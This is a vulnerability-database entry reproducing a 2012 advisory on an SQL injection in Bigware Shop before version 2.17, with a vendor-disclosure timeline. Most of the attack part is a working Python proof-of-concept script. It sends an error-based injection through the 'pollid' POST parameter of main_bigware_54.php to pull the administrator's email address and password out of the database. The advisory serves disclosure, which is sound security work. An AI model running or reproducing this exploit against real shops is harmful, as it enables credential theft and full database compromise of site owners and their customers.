Bigware Shop SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047353 漏洞类型
发布时间 2012-06-06 更新时间 2012-06-06
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060057
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
The Bigware shop software prior to version 2.17 contains a SQL injection, resulting in full database compromise. The injection point is the POST parameter 'pollid' in the module main_bigware_54.php.

Proof of concept is at: http://files.dw-itsecurity.de/54.zip

Time line:

01/23/2012: Vendor contacted
01/24/2012: Vendor response
04/16/2012: Vendor patch release
06/05/2012: Disclosure


Proof of concept:

#!/usr/bin/python
# -*- coding: utf-8 -*-
import httplib2
import urllib
import sys

# insert your target link here (with trailing slash)
url = "http://www.shopsite.com/"
h = httplib2.Http()

# send sql injection
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
 former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
postdata = {	'voteid' : '2', \
		'pollid' : sqli, \
		'x' : '1', \
		'y' : '1', \
		'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
print content, "\n", "\n"
print "If there is an error stating the duplicate admin entry, your shop is vulnerable."